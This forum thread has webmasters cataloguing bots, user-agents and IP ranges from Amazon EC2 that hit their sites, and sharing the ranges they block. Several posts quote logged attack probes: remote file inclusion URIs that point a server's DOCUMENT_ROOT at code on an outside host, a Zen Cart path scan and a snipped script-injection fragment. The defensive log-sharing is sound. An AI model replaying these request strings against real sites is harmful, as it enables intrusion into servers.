Welcome to WebmasterWorld Guest from 54.147.199.169

Forum Moderators: Ocean10000 & incrediBILL & keyplyr

Message Too Old, No Replies

amazonaws.com plays host to wide variety of bad bots

Most recently seen: Gnomit

     
3:04 am on Jan 18, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts:2038
votes: 1


ec2-67-202-57-30.compute-1.amazonaws.com
Mozilla/5.0 (compatible; X11; U; Linux i686 (x86_64); en-US; +http://gnomit.com/) Gecko/2008092416 Gnomit/1.0"

- robots.txt? NO
- Uneven apostrophes in UA (only closing)
- site in UA yields this oh-so-descriptive info:

<html>
<head>
</head>
<body>
</body>
</html>

----- ----- ----- ----- -----
FWIW, bona fide amazonaws.com hosts spewed at least 33 bots on two of my sites in recent months. (Does someone get paid per bot or something?) Some bots may be new to some of you; or newly renamed. Here are the actual UA strings; in no particular order:

NetSeer/Nutch-0.9 (NetSeer Crawler; [netseer.com;...] crawler@netseer.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
[Note ru.]
robots.txt? NO

feedfinder/1.371 Python-urllib/1.16 +http://www.aaronsw.com/2002/feedfinder/
robots.txt? NO

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008022910 Viewzi/0.1
robots.txt? NO

Twitturly / v0.5
robots.txt? NO

YebolBot (compatible; Mozilla/5.0; MSIE 7.0; Windows NT 6.0; rv:1.8.1.11; mailTo:thunder.chang@gmail.com)
robots.txt? NO

YebolBot (Email: yebolbot@gmail.com; If the web crawling affects your web service, or you don't like to be crawled by us, please email us. We'll stop crawling immediately.)
[Whattaya think robots.txt is for, huh?]
robots.txt? YES ... Four times in 45 minutes

Attributor/Dejan-1.0-dev (Test crawler; [attributor.com;...] info at attributor com)
robots.txt? NO

PRCrawler/Nutch-0.9 (data mining development project)
robots.txt? YES

EnaBot/1.2 (http://www.enaball.com/crawler.html)
robots.txt? YES

Nokia6680/1.0 ((4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html) )
[Note spaced-out closing parens]
robots.txt? YES

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461) Java/1.5.0_09
robots.txt? NO

TheRarestParser/0.2a (http://therarestwords.com/)
robots.txt? NO

Mozilla/5.0 (compatible; D1GArabicEngine/1.0; crawlmaster@d1g.com)
robots.txt? NO

Clustera Crawler/Nutch-1.0-dev (Clustera Crawler; [crawler.clustera.com;...] cluster@clustera.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
robots.txt? YES

yacybot (i386 Linux 2.6.16-xenU; java 1.6.0_02; America/en) [yacy.net...]
robots.txt? NO

Mozilla/5.0
robots.txt? NO

Spock Crawler (http://www.spock.com/crawler)
robots.txt? YES

TinEye
robots.txt? NO

Teemer (NetSeer, Inc. is a Los Angeles based Internet startup company.; [netseer.com...] crawler@netseer.com)
robots.txt? YES

nnn/ttt (n)
robots.txt? YES

AideRSS/1.0 (aiderss.com)
robots.txt? NO

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
robots.txt? NO

----- ----- ----- ----- -----
These two UAs alternated multiple times one afternoon:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
robots.txt? NO

WebClient
robots.txt? YES

----- ----- ----- ----- -----
And finally, way too many offerings from "Paul," who's apparently unable to make up his mind, UA name-wise:

Mozilla/5.0 (compatible; page-store) [email:paul at page-store.com
robots.txt? NO

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com)
robots.txt? YES

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

-----
Slippery little suckers indeed. Thank goodness I block amazonaws.com no matter what.

7:31 pm on Nov 17, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Many, many AWS-based UAs still hitting home and specific pages. robots.txt? NEVER.

DAILY (multiple times; always HEAD requests):

ec2-75-101-197-164.compute-1.amazonaws.com
PycURL/7.18.2

ec2-174-129-141-109.compute-1.amazonaws.com
PostRank/2.0 (postrank.com)

WEEKLY (approx.; always HEAD requests):

ec2-174-129-91-231.compute-1.amazonaws.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

(Two days earlier, Netcraft sent its minion...)

lager.netcraft.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

10:20 pm on Nov 17, 2009 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts: 3135
votes: 4


I just dumped the whole 174.129.nnn.nnn block into IIS's Security Deny list - won't ever see it again even in the logs. A /24 of a persistent 75.101 block followed it in and is likely to be extended any day now...
11:38 pm on Nov 17, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


One more for your files, dstiles:)

I forgot to mention this many, many, many times a day pest. No robots.txt, 'natch. GETs, not HEADs:

ec2-67-202-15-174.compute-1.amazonaws.com
Python-urllib/2.6

12:06 am on Nov 18, 2009 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts: 3135
votes: 4


Only got one hit near that this month (176, not 174) but lots more in the 67.202.nnn.nnn range. Their days may be numbered but I'm interested in seeing what else comes along. :)

I already have all known (to me) AWS blocks blocked with hits logged, including 67.202.0.0 - 67.202.127.255. It's when the hits cloud other logged issues that I react violently. :)

6:40 pm on Nov 19, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:July 26, 2006
posts:1619
votes: 0


Yup .. had to just block ALL
174.129.x.x

MASSIVE amounts of form submits like 600 in less than one minute.

8:01 pm on Nov 19, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Amazon's Elastic Compute Cloud (EC2)/AWS hosting gets bigger and biggger and bigggger:

174.129.0.0 - 174.129.255.255
174.129.0.0/16

@Bewenched: Yikes. Were you attacked by a single IP/amazonaws.com Host? If yes, which one, please? Also, was there one particular UA? TIA

10:51 pm on Nov 19, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


ec2-174-129-75-209.compute-1.amazonaws.com
SheenBot/SheenBot-1.0.0 (Sheen web crawler)

robots.txt? Yes

11:00 pm on Nov 19, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Two UAs crawling Tweeted URLs:

ec2-174-129-62-166.compute-1.amazonaws.com
Typhoeus - http://github.com/pauldix/typhoeus/tree/master

robots.txt? NO

ec2-75-101-227-191.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.1

robots.txt? NO

9:11 am on Nov 21, 2009 (gmt 0)

Moderator This Forum from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7009
votes: 175


ec2-174-129-225-12.compute-1.amazonaws.com
UA: Who.is Bot
robots.txt: no

hit / and ran

9:46 am on Nov 21, 2009 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:7055
votes: 424


I'm this close to Deny 174.129* that I have to ask (and I ask because this topic thrills me but I have little to zero ambition to learn it fully) are there ANY legit visitors from this domain? So far I've seen none. I lean toward whitelisting (less work) than expending oodles of time in pissant deny because the latter is SO much more work!
10:09 pm on Nov 21, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


I block by Host (amazonaws) and I've yet to see a single real-person-in-real-time hit from AWS since before I began this thread on Jan. 17, 2009. Rapid-fire assaults increase every week, like this 90-second blitz from a few days ago (partial listing):

[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:38 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:52:41 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:53:17 2009] [client 174.129.175.212] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:54:09 2009] [client 174.129.175.212] client denied by server configuration: (file path)

That range, that place, gives irresponsible bot-runners a place to hide and breed.

11:21 pm on Nov 21, 2009 (gmt 0)

Moderator This Forum from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7009
votes: 175


What range does Amazon's A9 search engine crawl from?
8:39 am on Nov 22, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Good Q. Beats me. Never spotted an A9 hit -- anyone? Then again, it appears A9 is primarily product-oriented now and none of my sites sell stuff. Rather, the majority of my hits from AWS are social network-related.
5:23 pm on Nov 22, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Alas, even Amazon EC2 (Amazon Elastic Compute Cloud) isn't free of exploit-probers:

ec2-67-202-25-2.compute-1.amazonaws.com
Toata dragostea mea pentru diavola

11/22 07:59:29 /1.1
11/22 07:59:29 /install.txt
11/22 07:59:29 /
11/22 07:59:30 /cart/
11/22 07:59:30 /zencart/
11/22 07:59:30 /zen-cart/
11/22 07:59:30 /zen/
11/22 07:59:30 /shop/

Here's info [webmasterworld.com] about the primary 'toata' UA. (There are variations.) As a Romanian-speaking pal of GaryK's translated here [webmasterworld.com], it means: "I love the devil."

4:57 am on Nov 24, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Yikes. Another exploit this evening:

ec2-67-202-60-246.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.0

//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

At least AWS has recommendations/info [aws.amazon.com] for reporting abuse. Wonder if bad bots qualify as report-worthy, too?;)

---
P.S./FYI

The following hosts/UAs just requested the exact same 'file' -- the URIs match even down to the exact same clientid and site referenced -- within the same 20-minute period. Googlebot, which was the only one to request robots.txt, was also the only one to attempt the hit twice (1 min. apart):

icerocket.com
BlogSearch/1.0 +http://www.icerocket.com/

87.218.210-nn.q9.net
Java/1.6.0_14

crawl-66-249-71-107.googlebot.com
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

64.94.67.nnn
Moreoverbot/5.00 (+http://www.moreover.com; webmaster@moreover.com)

Who's crawling/exploiting whom?

8:59 am on Nov 24, 2009 (gmt 0)

Moderator This Forum from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7009
votes: 175


//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

There's a lot of that coming from various hosts.
10:01 am on Dec 1, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


ec2-67-202-41-144.compute-1.amazonaws.com
cierzo/Nutch-0.9

robots.txt? Yes

10:33 pm on Dec 3, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


ec2-75-101-232-27.compute-1.amazonaws.com
MetaURI API +metauri.com

robots.txt? NO

1:09 am on Dec 4, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


ec2-75-101-158-138.compute-1.amazonaws.com
my6sense/1.0

robots.txt? NO

2:49 am on Dec 7, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Emphasis mine. Running from amazonaws, this is a bot. But it's also a FF add-on, which means, if it alters all FF strings, it'll be iffy distinguishing potential hits from less obvious/notorious server farms.

ec2-75-101-196-241.compute-1.amazonaws.com
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (MrTweet/1.0)

robots.txt? NO

8:10 pm on Dec 9, 2009 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts: 3135
votes: 4


Just to add another reason to block the cloud:

"Zeus crimeware using Amazon's EC2 as command and control server"
(from zdnet security blog)

A few days ago I noted in another thread that I'd seen an AWS IP in the midst of botnet accesses.

2:00 am on Dec 21, 2009 (gmt 0)

Moderator This Forum from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7009
votes: 175


...an AWS IP in the midst of botnet accesses.

In the "midst?" Ha, I looked up "botnet" and expected to see a thumbnail of Amazon EC2:

174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"
75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"
67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.2.96 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 936 "-" "-"
75.101.213.151 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
174.129.107.93 - - [19/Dec/2009:08:13:41 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"

5:36 pm on Dec 22, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts:2038
votes: 1


ec2-174-129-64-134.compute-1.amazonaws.com
Mozilla/5.0 (compatible; XmarksFetch/1.0; +http://www.xmarks.com/about/crawler; info@xmarks.com)

robots.txt? Yes

6:14 pm on Dec 22, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Speaking of AWS/EC and botnet-related exploits... Three seconds apart:

.
Mozilla/5.0
22:36:04///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

ec2-204-236-129-29.us-west-1.compute.amazonaws.com
Mozilla/5.0
22:36:07///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

Notes:

- The first hit's dot-as-host IP turned out to be 99.198.118.18*, a Chicago-based server farm. Search results show the same IP and exploit hitting elsewhere.

- The intra-URI exploit domain obfuscated in both hits as 'example.com' has approx. 2,150 search results. Its page title? "Verified by Visa" (and content includes "Start by entering your Visa card below...").

- If you're blocking on amazonaws.com subdomain formats, the second hit is slightly different. Typically, they're --

IP.compute-1(or2,etc).amazonaws.com

-- but this is:

IP.us-west-1.compute.amazonaws.com

There are more variations here [robtex.com]. (I block on amazonaws.com)

8:24 pm on Dec 22, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Whoa. Another one. Wonder when AWS/EC2 is going to clean up its act?

ec2-75-101-138-216.compute-1.amazonaws.com
Mozilla/5.0
10:47:33 //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?

Note: .su is the Soviet Union.

(FWIW, I won't keep posting exploit events because this thread's for spider-sitings and the fake UA has been reported.)

3:46 pm on Jan 1, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts: 3135
votes: 4


Just found a new (to me) Amazon IP block. Cloud but not labelled AWS.

IP: 204.236.128.0 - 204.236.255.255
UA: Chen Li/Nutch-1.0 (Nutch spiderman; [chenli....] com. cn; chenlibiti @163. com)
Robots: No idea.

Amazon.com, Inc.
OrgID: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2

4:59 pm on Jan 1, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Good spotting, dstiles! Shoot. Cloaked servers now, too -- and w/ a UA related to China via .cn and 163.com, hosts with long histories of nastiness on my sites. In a word: Ugh.

FWIW, here's yet another UA:

ec2-174-129-141-135.compute-1.amazonaws.com
Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

robots.txt? NO

11:12 pm on Jan 1, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3135
votes: 4


Already got the whole range 174.129.0.0 - 174.129.255.255 blocked! :)
10:05 am on Jan 12, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


No UA at all this time, and only went for favicon.ico:

ec2-75-101-169-108.compute-1.amazonaws.com
-

robots.txt? NO

10:50 am on Jan 12, 2010 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:7055
votes: 424


Pfui...

This has been a very interesting thread... what say you parse it to significance and reduce to the fully skinny? For the kiddies out there yet to ask the query?

More fun: provide ip ranges ala amazonaws.com

This 278 message thread spans 10 pages: 278